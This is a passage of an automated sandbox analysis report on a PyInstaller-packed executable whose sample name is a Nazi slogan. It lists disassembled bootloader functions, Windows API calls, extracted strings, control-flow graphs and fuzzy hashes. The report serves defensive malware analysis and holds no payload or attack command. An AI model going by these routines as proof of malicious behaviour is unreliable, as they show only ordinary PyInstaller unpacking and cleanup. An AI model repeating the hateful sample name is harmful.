                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                            • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                            • Opcode ID: 27943e01e1a6207795b46aedf17b893e8f8e32d3898c7290fa00b00b011f2019
                                                                                                                                                                                                                                            • Instruction ID: 0eb346d6c770e15e92253ca69477e5e7d831923dfad77cb800914853cad8e879
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27943e01e1a6207795b46aedf17b893e8f8e32d3898c7290fa00b00b011f2019
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0432AC21A0C68291FB15DBA494573B973A1AF44780FC44236DA6DE77E6EF2CF558E300
                                                                                                                                                                                                                                            Function 00007FF633D86964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 538 7ff633d86964-7ff633d869d7 call 7ff633d86698 541 7ff633d869d9-7ff633d869e2 call 7ff633d74ee8 538->541 542 7ff633d869f1-7ff633d869fb call 7ff633d78520 538->542 549 7ff633d869e5-7ff633d869ec call 7ff633d74f08 541->549 547 7ff633d869fd-7ff633d86a14 call 7ff633d74ee8 call 7ff633d74f08 542->547 548 7ff633d86a16-7ff633d86a7f CreateFileW 542->548 547->549 551 7ff633d86afc-7ff633d86b07 GetFileType 548->551 552 7ff633d86a81-7ff633d86a87 548->552 565 7ff633d86d32-7ff633d86d52 549->565 558 7ff633d86b5a-7ff633d86b61 551->558 559 7ff633d86b09-7ff633d86b44 GetLastError call 7ff633d74e7c CloseHandle 551->559 555 7ff633d86ac9-7ff633d86af7 GetLastError call 7ff633d74e7c 552->555 556 7ff633d86a89-7ff633d86a8d 552->556 555->549 556->555 563 7ff633d86a8f-7ff633d86ac7 CreateFileW 556->563 561 7ff633d86b69-7ff633d86b6c 558->561 562 7ff633d86b63-7ff633d86b67 558->562 559->549 572 7ff633d86b4a-7ff633d86b55 call 7ff633d74f08 559->572 569 7ff633d86b72-7ff633d86bc7 call 7ff633d78438 561->569 570 7ff633d86b6e 561->570 562->569 563->551 563->555 577 7ff633d86bc9-7ff633d86bd5 call 7ff633d868a0 569->577 578 7ff633d86be6-7ff633d86c17 call 7ff633d86418 569->578 570->569 572->549 577->578 585 7ff633d86bd7 577->585 583 7ff633d86c1d-7ff633d86c5f 578->583 584 7ff633d86c19-7ff633d86c1b 578->584 587 7ff633d86c81-7ff633d86c8c 583->587 588 7ff633d86c61-7ff633d86c65 583->588 586 7ff633d86bd9-7ff633d86be1 call 7ff633d7aac0 584->586 585->586 586->565 591 7ff633d86c92-7ff633d86c96 587->591 592 7ff633d86d30 587->592 588->587 590 7ff633d86c67-7ff633d86c7c 588->590 590->587 591->592 594 7ff633d86c9c-7ff633d86ce1 CloseHandle CreateFileW 591->594 592->565 595 7ff633d86d16-7ff633d86d2b 594->595 596 7ff633d86ce3-7ff633d86d11 GetLastError call 7ff633d74e7c call 7ff633d78660 594->596 595->592 596->595
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                                            • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                            • Instruction ID: 89c632f8cecc42cd5d3a3afa7ff96505a68fc3a8e9bccf3b8a24fbe497977bd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14C1AF36B28A4585EB11CFA9C4926AC3761FB49BA8B015335DF2EAB7D4DF38E055D300
                                                                                                                                                                                                                                            Function 00007FF633D683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D6842B
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684AE
                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684CD
                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684DB
                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684EC
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684F5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                            • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                            • Instruction ID: 3d6ec63bfd8af715c8e5da51951a36cb782d4503c1980f80a6f345d69cf020b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1417331A0C98285EA309BA4E4565BA7361FB94755FC00332DAAEE77D8EF3CE549D700
                                                                                                                                                                                                                                            Function 00007FF633D69280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                            • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                            • Instruction ID: c398fd0573cd36a510ed8dd3cff5e559f13ae2d8f5793ff5aa1c63212eee7f96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0C832A1874186F7A08FA0B49A7667350BB84328F840335D97F567D4DF3CD058DB00
                                                                                                                                                                                                                                            Function 00007FF633D61950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 331 7ff633d61950-7ff633d6198b call 7ff633d645c0 334 7ff633d61c4e-7ff633d61c72 call 7ff633d6c550 331->334 335 7ff633d61991-7ff633d619d1 call 7ff633d67f90 331->335 340 7ff633d61c3b-7ff633d61c3e call 7ff633d7004c 335->340 341 7ff633d619d7-7ff633d619e7 call 7ff633d706d4 335->341 344 7ff633d61c43-7ff633d61c4b 340->344 346 7ff633d619e9-7ff633d61a03 call 7ff633d74f08 call 7ff633d62910 341->346 347 7ff633d61a08-7ff633d61a24 call 7ff633d7039c 341->347 344->334 346->340 353 7ff633d61a26-7ff633d61a40 call 7ff633d74f08 call 7ff633d62910 347->353 354 7ff633d61a45-7ff633d61a5a call 7ff633d74f28 347->354 353->340 361 7ff633d61a7b-7ff633d61afc call 7ff633d61c80 * 2 call 7ff633d706d4 354->361 362 7ff633d61a5c-7ff633d61a76 call 7ff633d74f08 call 7ff633d62910 354->362 373 7ff633d61b01-7ff633d61b14 call 7ff633d74f44 361->373 362->340 376 7ff633d61b16-7ff633d61b30 call 7ff633d74f08 call 7ff633d62910 373->376 377 7ff633d61b35-7ff633d61b4e call 7ff633d7039c 373->377 376->340 383 7ff633d61b6f-7ff633d61b8b call 7ff633d70110 377->383 384 7ff633d61b50-7ff633d61b6a call 7ff633d74f08 call 7ff633d62910 377->384 391 7ff633d61b8d-7ff633d61b99 call 7ff633d62710 383->391 392 7ff633d61b9e-7ff633d61bac 383->392 384->340 391->340 392->340 393 7ff633d61bb2-7ff633d61bb9 392->393 396 7ff633d61bc1-7ff633d61bc7 393->396 398 7ff633d61bc9-7ff633d61bd6 396->398 399 7ff633d61be0-7ff633d61bef 396->399 400 7ff633d61bf1-7ff633d61bfa 398->400 399->399 399->400 401 7ff633d61bfc-7ff633d61bff 400->401 402 7ff633d61c0f 400->402 401->402 403 7ff633d61c01-7ff633d61c04 401->403 404 7ff633d61c11-7ff633d61c24 402->404 403->402 405 7ff633d61c06-7ff633d61c09 403->405 406 7ff633d61c2d-7ff633d61c39 404->406 407 7ff633d61c26 404->407 405->402 408 7ff633d61c0b-7ff633d61c0d 405->408 406->340 406->396 407->406 408->404
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D67F90: _fread_nolock.LIBCMT ref: 00007FF633D6803A
                                                                                                                                                                                                                                            • _fread_nolock.LIBCMT ref: 00007FF633D61A1B
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                            • Opcode ID: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                                                                                                                                                                            • Instruction ID: 1855953544a3383a96094cab659c93698b37e88630c9d79497d49a2ddd2127ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C81C371A0C68286EB20DBA4D0532FD73A0FF88784F844635E99DE7795DE3CE585A740
                                                                                                                                                                                                                                            Function 00007FF633D61600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 409 7ff633d61600-7ff633d61611 410 7ff633d61637-7ff633d61651 call 7ff633d645c0 409->410 411 7ff633d61613-7ff633d6161c call 7ff633d61050 409->411 416 7ff633d61653-7ff633d61681 call 7ff633d74f08 call 7ff633d62910 410->416 417 7ff633d61682-7ff633d6169c call 7ff633d645c0 410->417 418 7ff633d6162e-7ff633d61636 411->418 419 7ff633d6161e-7ff633d61629 call 7ff633d62710 411->419 426 7ff633d616b8-7ff633d616cf call 7ff633d706d4 417->426 427 7ff633d6169e-7ff633d616b3 call 7ff633d62710 417->427 419->418 434 7ff633d616f9-7ff633d616fd 426->434 435 7ff633d616d1-7ff633d616f4 call 7ff633d74f08 call 7ff633d62910 426->435 433 7ff633d61821-7ff633d61824 call 7ff633d7004c 427->433 443 7ff633d61829-7ff633d6183b 433->443 436 7ff633d61717-7ff633d61737 call 7ff633d74f44 434->436 437 7ff633d616ff-7ff633d6170b call 7ff633d61210 434->437 448 7ff633d61819-7ff633d6181c call 7ff633d7004c 435->448 449 7ff633d61739-7ff633d6175c call 7ff633d74f08 call 7ff633d62910 436->449 450 7ff633d61761-7ff633d6176c 436->450 445 7ff633d61710-7ff633d61712 437->445 445->448 448->433 462 7ff633d6180f-7ff633d61814 449->462 451 7ff633d61802-7ff633d6180a call 7ff633d74f30 450->451 452 7ff633d61772-7ff633d61777 450->452 451->462 455 7ff633d61780-7ff633d617a2 call 7ff633d7039c 452->455 464 7ff633d617da-7ff633d617e6 call 7ff633d74f08 455->464 465 7ff633d617a4-7ff633d617bc call 7ff633d70adc 455->465 462->448 472 7ff633d617ed-7ff633d617f8 call 7ff633d62910 464->472 470 7ff633d617c5-7ff633d617d8 call 7ff633d74f08 465->470 471 7ff633d617be-7ff633d617c1 465->471 470->472 471->455 474 7ff633d617c3 471->474 477 7ff633d617fd 472->477 474->477 477->451
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                            • Opcode ID: cb3c2a77d8d213a9a8c367c96bf5f808a4f883a2ce5e30ac5d600dd79daf51e0
                                                                                                                                                                                                                                            • Instruction ID: a6bdfd9945747aa285e8d803024d7a6b3daf8c6c94dac3d1c141db40db657a2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb3c2a77d8d213a9a8c367c96bf5f808a4f883a2ce5e30ac5d600dd79daf51e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D51B061B0864392EA10ABE1A4131B973A0BF84794F844732EEACE77D6DF3CF555A740
                                                                                                                                                                                                                                            Function 00007FF633D68660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,00000000,00007FF633D63CBB), ref: 00007FF633D68704
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6870A
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00007FF633D63CBB), ref: 00007FF633D6874C
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68830: GetEnvironmentVariableW.KERNEL32(00007FF633D6388E), ref: 00007FF633D68867
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF633D68889
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D78251
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                            • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                            • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                            • Instruction ID: 75af0323ff9a80efafbbee8e034c6139ae6b0d248ea7fffc3df1f4c364d7745c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A341A421A1964284FA10ABE5A8672B963A1AF847C1FC05331ED1DFB7DADE3CE545E340
                                                                                                                                                                                                                                            Function 00007FF633D61210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 601 7ff633d61210-7ff633d6126d call 7ff633d6bd80 604 7ff633d61297-7ff633d612af call 7ff633d74f44 601->604 605 7ff633d6126f-7ff633d61296 call 7ff633d62710 601->605 610 7ff633d612d4-7ff633d612e4 call 7ff633d74f44 604->610 611 7ff633d612b1-7ff633d612cf call 7ff633d74f08 call 7ff633d62910 604->611 616 7ff633d612e6-7ff633d61304 call 7ff633d74f08 call 7ff633d62910 610->616 617 7ff633d61309-7ff633d6131b 610->617 622 7ff633d61439-7ff633d6144e call 7ff633d6ba60 call 7ff633d74f30 * 2 611->622 616->622 621 7ff633d61320-7ff633d61345 call 7ff633d7039c 617->621 630 7ff633d6134b-7ff633d61355 call 7ff633d70110 621->630 631 7ff633d61431 621->631 638 7ff633d61453-7ff633d6146d 622->638 630->631 636 7ff633d6135b-7ff633d61367 630->636 631->622 639 7ff633d61370-7ff633d61398 call 7ff633d6a1c0 636->639 642 7ff633d6139a-7ff633d6139d 639->642 643 7ff633d61416-7ff633d6142c call 7ff633d62710 639->643 644 7ff633d6139f-7ff633d613a9 642->644 645 7ff633d61411 642->645 643->631 647 7ff633d613ab-7ff633d613b9 call 7ff633d70adc 644->647 648 7ff633d613d4-7ff633d613d7 644->648 645->643 653 7ff633d613be-7ff633d613c1 647->653 650 7ff633d613ea-7ff633d613ef 648->650 651 7ff633d613d9-7ff633d613e7 call 7ff633d89e30 648->651 650->639 652 7ff633d613f5-7ff633d613f8 650->652 651->650 656 7ff633d613fa-7ff633d613fd 652->656 657 7ff633d6140c-7ff633d6140f 652->657 658 7ff633d613c3-7ff633d613cd call 7ff633d70110 653->658 659 7ff633d613cf-7ff633d613d2 653->659 656->643 660 7ff633d613ff-7ff633d61407 656->660 657->631 658->650 658->659 659->643 660->621
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                            • Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                            • Instruction ID: d5e919ad1cdf2258e930a2683505d67dca29f55f9e989f0f3a5ac0180549bd08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6251F822A0864285EA209F91E4523BA7390FF85794F844335ED9EE77D5EF3CE545E700
                                                                                                                                                                                                                                            Function 00007FF633D7ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,-00000018,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE8C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,-00000018,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
